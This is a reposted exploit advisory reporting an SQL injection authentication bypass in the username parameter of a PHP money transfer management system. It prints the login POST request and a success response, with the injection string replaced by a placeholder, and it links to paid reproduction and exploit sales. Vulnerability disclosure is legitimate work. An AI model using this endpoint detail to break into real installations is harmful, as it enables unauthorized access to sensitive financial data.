Money Transfer Management System (MTMS) v1.0 存在 SQL 注入漏洞,攻击者可通过用户名参数绕过身份验证,在无需密码的情况下登录并获取敏感信息。 2025-4-24 16:54:58 Author: cxsecurity.com(查看原文) 阅读量:5 收藏
Money Transfer Management System - MTMS- PHP 1.0 SQLi-Bypass Authentication
# Titles: Money Transfer Management System - MTMS- PHP (by: oretnom23 ) v1.0 SQLi-Bypass Authentication # Author: nu11secur1ty # Date: 04/24/2025 # Vendor: https://github.com/oretnom23 # Software: https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html # Reference: https://portswigger.net/web-security/sql-injection ## Description: The username parameter is vulnerable for SQLi-Bypass Authentication vulnerability. The parameter is not sanitizing well, no matter that you've changed the password the attacker can get all sensitive information from this system when he attacks it online, He can login super easily WITHOUT PASSWORD - ONLY USER - bypassing, and can crash or get every sensitive information from him! STATUS: HIGH-CRITICAL Vulnerability [+]Exploit: - SQLi: ```SQLi POST /mtms/classes/Login.php?f=login HTTP/1.1 Host: pwnedhost.com Cookie: PHPSESSID=jbnk1aq9koik72ud3g4stt6ik3 Content-Length: 44 Sec-Ch-Ua-Platform: "Windows" Accept-Language: en-US,en;q=0.9 Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8" Sec-Ch-Ua-Mobile: ?0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: https://pwnedhost.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pwnedhost.com/mtms/admin/login.php Accept-Encoding: gzip, deflate, br Priority: u=1, i Connection: keep-alive username=_the_exploit_here_&password= ``` [+]Response: ``` HTTP/1.1 200 OK Date: Thu, 24 Apr 2025 06:48:30 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 X-Powered-By: PHP/8.2.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 20 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 {"status":"success"} ``` # Reproduce: [href](https://www.patreon.com/posts/money-transfer-0-127342523) # Buy an exploit only: [href](https://satoshidisk.com/pay/COEb97) # Time spent: 00:15:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
如有侵权请联系:admin#unsafe.sh